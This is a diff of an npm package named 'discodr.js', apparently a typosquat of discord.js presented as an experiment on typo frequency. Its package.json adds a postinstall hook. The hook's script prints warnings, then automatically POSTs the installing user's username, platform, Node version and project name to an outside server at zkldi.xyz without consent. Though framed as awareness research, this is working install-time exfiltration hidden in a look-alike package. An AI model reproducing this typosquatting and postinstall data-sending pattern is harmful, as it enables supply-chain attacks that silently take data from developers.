discodr.js 1.0.0

package/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "discodr.js",
+  "version": "1.0.0",
+  "description": "This package is intended to catch typos for discord.js safely. Please be careful.",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "postinstall": "node postinstall.js"
+  },
+  "author": "",
+  "license": "ISC"
+}

package/postinstall.js

@@ -0,0 +1,33 @@
+// since you're reading this: the point of this package is to actually test how common it is
+// for people to make this typo.
+// If I was an attacker, how much damage could I do right here?
+// Is it even possible to do anything about this? (yeah, but not without unseating 95% of the ecosystem)
+const http = require("http");
+const fs = require("fs");
+
+console.log("!!! YOU HAVE INSTALLED THE WRONG PACKAGE !!!");
+console.log("!!! You have installed a typo'd package for discord.js !!!");
+console.log("!!! UPON INSTALLING A PACKAGE THE PACKAGE MAY EXECUTE ANYTHING THEY WANT (I'm writing this to you from your shell!) !!!");
+console.log("!!! Please, be more careful. And maybe NPM should do something about this. !!!");
+console.log("!!! If I was an attacker, I could type anything I wanted right now into your shell. !!!");
+console.log("!!! Please uninstall this package. !!!");
+
+let pkgname;
+
+try {
+	pkgname = JSON.parse(fs.readFileSync("./package.json")).name
+} catch { }
+
+const thingToLog = /* process.env is a bit too unethical for an experiment. Might actually have secrets. */
+	{ arch: process.arch, version: process.version, user: process.env.USER, pkgname }
+
+const req = http.request("http://zkldi.xyz:1235/discordjs-test", { method: "POST", headers: { "Content-Type": "application/json" } }, (res) => {
+	process.exit(1);
+});
+
+req.write(JSON.stringify(thingToLog));
+req.end();
+
+setTimeout(() => {
+	process.exit(2)
+}, 10_000);